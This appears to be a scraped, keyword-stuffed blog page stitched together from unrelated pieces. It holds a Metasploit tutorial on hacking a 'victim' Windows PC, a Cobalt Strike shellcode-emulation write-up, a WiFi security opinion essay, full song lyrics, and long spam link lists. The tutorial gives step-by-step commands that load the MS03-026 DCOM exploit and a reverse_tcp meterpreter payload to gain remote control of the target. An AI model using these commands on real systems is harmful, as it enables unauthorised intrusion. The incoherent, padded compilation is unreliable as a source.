sexta-feira, 26 de maio de 2023

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
Related posts
  1. Hack Website Online Tool
  2. Hacker Tools
  3. Blackhat Hacker Tools
  4. Beginner Hacker Tools
  5. Hacker
  6. Pentest Reporting Tools
  7. Free Pentest Tools For Windows
  8. Hacking Tools And Software
  9. Pentest Tools Subdomain
  10. Hacking App
  11. Hacker Techniques Tools And Incident Handling
  12. Hack Tools
  13. Hack Rom Tools
  14. Pentest Tools Open Source
  15. Pentest Tools Open Source
  16. Hackers Toolbox
  17. Hacking Tools Name
  18. Hacker Tools 2020
  19. Pentest Tools Free
  20. Hack Tools Pc
  21. New Hack Tools
  22. Pentest Tools Alternative
  23. Pentest Tools Website Vulnerability
  24. World No 1 Hacker Software
  25. Pentest Tools Review
  26. Pentest Tools Framework
  27. Pentest Tools Framework
  28. Hacking Tools And Software
  29. Hacking Tools Software
  30. Hack Tools
  31. Hack Rom Tools
  32. Pentest Tools
  33. Hacker Tools Apk
  34. Hack Tools
  35. Hacking Tools For Pc
  36. Underground Hacker Sites
  37. Hacking Tools For Windows 7
  38. Hackrf Tools
  39. Pentest Tools For Android
  40. Usb Pentest Tools
  41. Pentest Tools Open Source
  42. Hacking Tools For Kali Linux
  43. Hacking Tools Usb
  44. Hacking Tools Github
  45. Hacking Tools Github
  46. Nsa Hacker Tools
  47. What Are Hacking Tools
  48. Hacking Tools Download
  49. Nsa Hack Tools
  50. Pentest Tools List
  51. Pentest Tools Linux
  52. Hacker Tools Hardware
  53. Hack Tools Pc
  54. Hacker Tools 2019
  55. Pentest Recon Tools
  56. Pentest Tools Kali Linux
  57. Hacker
  58. Hack Tools For Pc
  59. Growth Hacker Tools
  60. Hacking Apps
  61. Pentest Tools Review
  62. Hack App
  63. Hacking Tools Download
  64. Hacker Tools Linux
  65. Hacker Tools Free Download
  66. Hackers Toolbox
  67. Hacking Tools Free Download
  68. Hacker Tool Kit
  69. Hacker Tools Free Download
  70. Hak5 Tools
  71. Hacking Tools For Mac
  72. Pentest Tools Kali Linux
  73. Hacking Tools Free Download
  74. Hack Tool Apk No Root
  75. New Hack Tools
  76. Black Hat Hacker Tools

Emulating Shellcodes - Chapter 2

 Lets check different  Cobalt Strike shellcodes and stages in the shellcodes emulator SCEMU.




This stages are fully emulated well and can get the IOC and the behavior of the shellcode.

But lets see another first stage big shellcode with c runtime embedded in a second stage.


In this case is loading tons of API using GetProcAddress at the beginning, then some encode/decode pointer and tls get/set values to store an address. And ends up crashing because is jumping an address that seems more code than address 0x9090f1eb.

Here there are two types of allocations:


Lets spawn a console on -c 3307548 and see if some of this allocations has the next stage.

The "m" command show all the memory maps but the "ma" show only the allocations done by the shellcode.



Dumping memory with "md" we see that there is data, and dissasembling this address with "d" we see the prolog of a function.

So we have second stage unpacked in alloc_e40064


With "mdd" we do a memory dump to disk we found the size in previous screenshot,  and we can do  some static reversing of stage2 in radare/ghidra/ida

In radare we can verify that the extracted is the next stage:


I usually do correlation between the emulation and ghidra, to understand the algorithms.

If wee look further we can realize that the emulator called a function on the stage2, we can see the change of code base address and  is calling the allocated buffer in 0x4f...



And this  stage2 perform several API calls let's check it in ghidra.


We can see in the emulator that enters in the IF block, and what are the (*DAT_...)() calls

Before a crash lets continue to the SEH pointer, in this case is the way, and the exception routine checks IsDebuggerPresent() which is not any debugger pressent for sure, so eax = 0;



So lets say yes and continue the emulation.


Both IsDebuggerPresent() and UnHandledExceptionFilter() can be used to detect a debugger, but the emulator return what has to return to not be detected. 

Nevertheless the shellcode detects something and terminates the process.

Lets trace the branches to understand the logic:


target/release/scemu -f shellcodes/unsuported_cs.bin -vv | egrep '(\*\*|j|cmp|test)'



Continuing the emulation it's setting the SEH  pointer to previous stage:


Lets see from the console where is pointing the SEH chain item:


to be continued ...


https://github.com/sha0coder/scemu






Related articles


  1. Physical Pentest Tools
  2. Hacking Tools Name
  3. Hacker Tools For Pc
  4. How To Install Pentest Tools In Ubuntu
  5. Hack Tools For Mac
  6. Hacker Tool Kit
  7. Hacker Techniques Tools And Incident Handling
  8. Hacking Tools Software
  9. Hacking Tools Online
  10. World No 1 Hacker Software
  11. Tools Used For Hacking
  12. Hacker Tool Kit
  13. Pentest Tools
  14. Nsa Hack Tools
  15. Hacking Tools For Windows Free Download
  16. Hacker Tools Windows
  17. Hacking Tools For Games
  18. Hacking Tools
  19. Nsa Hack Tools
  20. What Is Hacking Tools
  21. Hacking Tools Kit
  22. Pentest Tools Review
  23. Beginner Hacker Tools
  24. Hack Tools Mac
  25. Pentest Box Tools Download
  26. Hacking Tools For Kali Linux
  27. Hack Tools Mac
  28. Hacker Techniques Tools And Incident Handling
  29. Hacking Tools For Mac
  30. Hack Tools Pc
  31. Hacker Tool Kit
  32. Hack Rom Tools
  33. Hacker Hardware Tools
  34. Hacking Tools For Pc
  35. Hacking Tools For Pc
  36. Hacking Tools Hardware
  37. Pentest Tools Url Fuzzer
  38. Hack App
  39. Hacker Tools 2019
  40. Pentest Tools For Mac
  41. Hacker Tools For Pc
  42. Hack Tools Online
  43. Hacker Tools For Pc
  44. Hack Tools Online
  45. World No 1 Hacker Software
  46. Pentest Tools
  47. Hack Tools For Windows
  48. Hacker Search Tools
  49. Hacking Tools Windows 10
  50. Hacking Tools Free Download
  51. Tools 4 Hack
  52. Android Hack Tools Github
  53. Hacker Tools For Ios
  54. Hack Website Online Tool
  55. Pentest Tools
  56. Pentest Automation Tools
  57. Hacker Hardware Tools
  58. Hacking Tools Windows 10
  59. Pentest Tools For Mac
  60. Hacking Tools Windows
  61. Pentest Tools Find Subdomains
  62. Hacking Tools 2019
  63. Hack And Tools
  64. Hack Rom Tools
  65. Hacker Tools Free Download
  66. Pentest Tools Find Subdomains
  67. Pentest Tools Github
  68. Hack Tools
  69. Wifi Hacker Tools For Windows
  70. Pentest Tools Review
  71. Hacker Tools Windows
  72. Hacker Hardware Tools
  73. Hacking Tools Usb
  74. Pentest Tools List
  75. Wifi Hacker Tools For Windows
  76. Install Pentest Tools Ubuntu
  77. Tools For Hacker
  78. Nsa Hacker Tools
  79. Hack Tools Pc
  80. Pentest Tools Url Fuzzer
  81. Hack Rom Tools
  82. Tools 4 Hack
  83. Hacker Hardware Tools
  84. Tools For Hacker
  85. Hacker Tools List
  86. Hack Tools Download
  87. Hacking Tools Online
  88. Wifi Hacker Tools For Windows
  89. Blackhat Hacker Tools
  90. Best Pentesting Tools 2018
  91. Hacking Tools For Beginners
  92. Hacker Tools 2020
  93. Hacker Tools For Pc
  94. Hacking Tools And Software
  95. Install Pentest Tools Ubuntu
  96. How To Hack
  97. Hacking Tools For Windows
  98. Hack Tool Apk
  99. Hacking Tools Kit
  100. Hack Rom Tools
  101. Hacking Tools Usb
  102. Pentest Tools For Ubuntu
  103. Hacking Tools Windows 10
  104. Hack Tools For Windows
  105. Hackers Toolbox
  106. Hack Tools 2019
  107. Hack Tool Apk
  108. How To Hack
  109. Pentest Tools List
  110. Hacking Tools Online
  111. Hacking Tools For Kali Linux
  112. Hackers Toolbox
  113. Hack Tools For Pc
  114. Hackers Toolbox
  115. Nsa Hacker Tools
  116. Android Hack Tools Github
  117. Hack Tools Pc
  118. Computer Hacker
  119. Hacking Tools Mac
  120. Termux Hacking Tools 2019
  121. Blackhat Hacker Tools
  122. Github Hacking Tools
  123. Hacker Tools Software
  124. Pentest Tools Review
  125. Pentest Tools Github
  126. Hacking Tools Free Download
  127. Pentest Tools Nmap
  128. Hacking Tools Windows 10
  129. Hack Website Online Tool
  130. Hacking Tools Kit
  131. Hacker Tools For Ios
  132. Hacker Tools Free
  133. Pentest Tools List
  134. Best Hacking Tools 2020
  135. Pentest Tools Kali Linux
  136. Hacking Tools Kit
  137. Pentest Tools List
  138. Free Pentest Tools For Windows
  139. Pentest Tools Apk
  140. Hacker Tools Hardware
  141. Hack Website Online Tool
  142. What Are Hacking Tools
  143. Best Hacking Tools 2019
  144. Pentest Tools List
  145. Hacker Tools Github
  146. Hack Tools For Ubuntu
  147. Usb Pentest Tools
  148. Pentest Tools Framework
  149. Ethical Hacker Tools
  150. Hacker Tools
  151. Hacker Tools For Pc
  152. Hack Website Online Tool
  153. Game Hacking
  154. Hacker Tools
  155. Pentest Box Tools Download
  156. Hack Tools Mac
  157. Pentest Tools Subdomain
  158. Tools For Hacker
  159. Hack Tool Apk No Root
  160. Bluetooth Hacking Tools Kali
  161. Hacker Tools Hardware
  162. Pentest Tools Bluekeep

Mythbusters: Is An Open (Unencrypted) WiFi More Dangerous Than A WPA2-PSK? Actually, It Is Not.

Introduction


Whenever security professionals recommend the 5 most important IT security practices to average users, one of the items is usually something like: "Avoid using open Wifi" or "Always use VPN while using open WiFi" or "Avoid sensitive websites (e.g. online banking) while using open WiFI", etc.

What I think about this? It is bullshit. But let's not jump to the conclusions. Let's analyze all risks and factors here.


During the following analysis, I made two assumptions. The first one is that we are comparing public WiFi hotspots with no encryption at all (referred to as Open), and we compare this to public WiFi hotspots with WPA2-PSK (and just hope WEP died years before). The other assumption is there are people who are security-aware, and those who just don't care. They just want to browse the web, access Facebook, write e-mails, etc.

The risks


Let's discuss the different threats people face using public hotspots, compared to home/work internet usage:
1. Where the website session data is not protected with SSL/TLS (and the cookie is not protected with secure flag), attackers on the same hotspot can obtain the session data and use it in session/login credentials stealing. Typical protocols affected:

  • HTTP sites
  • HTTPS sites but unsecured cookie
  • FTP without encryption
  • IMAP/SMTP/POP3 without SSL/TLS or STARTTLS

2. Attackers can inject extra data into the HTTP traffic, which can be used for exploits, or social engineer attacks (e.g. update Flash player with our malware) – see the Dark Hotel campaign

3. Attackers can use tools like SSLStrip to keep the user's traffic on clear text HTTP and steal password/session data/personal information

4. Attackers can monitor and track user activity

5. Attackers can directly attack the user's machine (e.g. SMB service)

WPA2-PSK security


So, why is a public WPA2-PSK WiFi safer than an open WiFi? Spoiler alert: it is not!

In a generic public WPA2-PSK scenario, all users share the same password. And guess what, the whole traffic can be decrypted with the following information: SSID + shared password + information from the 4-way handshake. https://wiki.wireshark.org/HowToDecrypt802.11
If you want to see it in action, here is a nice tutorial for you
Decrypted WPA2-PSK traffic

Any user having access to the same WPA2-PSK network knows this information. So they can instantly decrypt your traffic. Or the attackers can just set up an access point with the same SSID, same password, and stronger signal. And now, the attacker can instantly launch active man-in-the-middle attacks. It is a common belief (even among ITSEC experts) that WPA2-PSK is not vulnerable to this attack. I am not sure why this vulnerability was left in the protocol, if you have the answer, let me know. Edit (2015-08-03): I think the key message here is that without server authentication (e.g. via PKI), it is not possible to solve this.
Let me link here one of my previous posts here with a great skiddie tool:

To sum up, attackers on a WPA2-PSK network can:

  • Decrypt all HTTP/FTP/IMAP/SMTP/POP3 passwords or other sensitive information
  • Can launch active attacks like SSLStrip, or modify HTTP traffic to include exploit/social engineer attacks
  • Can monitor/track user activity

The only difference between open and WPA2-PSK networks is that an open network can be hacked with an attacker of the skill level of 1 from 10, while the WPA2-PSK network needs and an attacker with a skill level of 1.5. That is the difference.

The real solutions



1. Website owners, service providers should deploy proper (trusted) SSL/TLS infrastructure, protect session cookies, etc. Whenever a user (or security professional) notices a problem with the quality of the service (e.g. missing SSL/TLS), the service provider has to be notified. If no change is made, it is recommended to drop the service provider and choose a more secure one. Users have to use HTTPS Everywhere plugin.

2. Protect the device against exploits by patching the software on it, use a secure browser (Chrome, IE11 + enhanced protection), disable unnecessary plugins (Java, Flash, Silverlight), or at least use it via click-to-play. Also, the use of exploit mitigations tools (EMET, HitmanPro Alert, Malwarebytes AntiExploit) and a good internet security suite is a good idea.

3. Website owners have to deploy HSTS, and optionally include their site in an HSTS preload list

4. Don't click blindly on fake downloads (like fake Flash Player updates)


5. The benefits of a VPN is usually overestimated. A VPN provider is just another provider, like the hotspot provider, or the ISP. They can do the same malicious stuff (traffic injecting, traffic monitoring, user tracking). Especially when people use free VPNs. And "Average Joe" will choose a free VPN. Also, VPN connections tend to be disconnected, and almost none of the VPN providers provide fail secure VPNs. Also, for the price of a good VPN service you can buy a good data plan and use 4G/3G instead of low-quality public hotspots. But besides this, on mobile OSes (Android, iOS, etc.) I strongly recommend the use of VPN, because it is not practically feasible to know for users which app is using SSL/TLS and which is not.

6. Use a location-aware firewall, and whenever the network is not trusted, set it to a Public.

7. In a small-business/home environment, buy a WiFi router with guest WiFi access possibility, where the different passwords can be set to guest networks than used for the other.

Asking the question "Are you using open WiFi?", or "Do you do online banking on open WiFi?" are the wrong questions. The good questions are:
  • Do you trust the operator(s) of the network you are using?
  • Are the clients separated?
  • If clients are not separated, is it possible that there are people with malicious intent on the network?
  • Are you security-aware, and are you following the rules previously mentioned? If you do follow these rules, those will protect you on whatever network you are.

And call me an idiot, but I do online banking, e-shopping, and all the other sensitive stuff while I'm using open WiFi. And whenever I order pizza from an HTTP website, attackers can learn my address. Which is already in the phone book, on Facebook, and in every photo metadata I took with my smartphone about my cat and uploaded to the Internet (http://iknowwhereyourcatlives.com/).


Most articles and research publications are full of FUD about what people can learn from others. Maybe they are just outdated, maybe they are not. But it is totally safe to use Gmail on an open WiFi, no one will be able to read my e-mails.

PS: I know "Average Joe" won't find my blog post, won't start to read it, won't understand half I wrote. But even if they do, they won't patch their browser plugins, pay for a VPN, or check the session cookie. So they are doomed to fail. That's life. Deal with it.

Related articles


Quando eu te falei em amor

Quando os meus olhos te tocaram
Eu senti que encontrara
A outra, metade de mim
Tive medo de acordar
Como se vivesse um sonho
Que não pensei em realizar
E a força do desejo
Faz me chegar perto de ti

Quando eu te falei em amor
Tu sorriste para mim
E o mundo ficou bem melhor
Quando eu te falei em amor
Nos sentimos os dois
Que o amanha vem depois
E não no fim

Estas linhas que hoje escrevo
São do livro da memória
Do que eu sinto por ti
E tudo o que tu me das
É parte da história que eu ainda não vivi
E a força do desejo
Faz me chegar de ti

Quando eu te falei em amor
Tu sorriste para mim
E o mundo ficou bem melhor
Quando eu te falei em amor
Nos sentimos os dois
Que o amanha vem depois e não no fim

André Sardet

Collide

The dawn is breaking
A light shining through
You're barely waking
And I'm tangled up in you
Yeah

But I'm open, you're closed
Where I follow, you'll go
I worry I won't see your face
Light up again

Even the best fall down sometimes
Even the wrong words seem to rhyme
Out of the doubt that fills my mind
I somehow find, you and I collide

I'm quiet, you know
You make a first impression
I've found I'm scared to know
I'm always on your mind

Even the best fall down sometimes
Even the stars refuse to shine
Out of the back you fall in time
I somehow find, you and I collide

Don't stop here
I've lost my place
I'm close behind

Even the best fall down sometimes
Even the wrong words seem to rhyme
Out of the doubt that fills your mind

You finally find, you and I collide
You finally find You and I collide
You finally findYou and I collide

Howie Day


Everything

You're a falling star, You're the get away
car.

You're the line in the sand when I go too
far.

You're the swimming pool, on an August day.
And You're the perfect thing to see.

And you play it coy, but it's kinda cute.
Ah, When you smile at me you know exactly what you
do.

Baby don't pretend, that you don't know it's
true.

Cause you can see it when I look at you.

And in this crazy life, and through these crazy
times

It's you, it's you, You make me sing.
You're every line, you're every word, you're
everything.


You're a carousel, you're a wishing well,
And you light me up, when you ring my bell.
You're a mystery, you're from outer space,
You're every minute of my everyday.

And I can't believe, uh that I'm your man,
And I get to kiss you baby just because I
can.

Whatever comes our way, ah we'll see it
through,

And you know that's what our love can do.

And in this crazy life, and through these crazy
times

It's you, it's you, You make me sing
You're every line, you're every word, you're
everything.


So, La, La, La, La, La, La, La
So, La, La, La, La, La, La, La

And in this crazy life, and through these crazy
times

It's you, it's you, You make me sing.
You're every line, you're every word, you're
everything.

You're every song, and I sing along.
Cause you're my everything.
yeah, yeah

So, La, La, La, La, La, La, La
So, La, La, La, La, La, La, La

Michael Bublé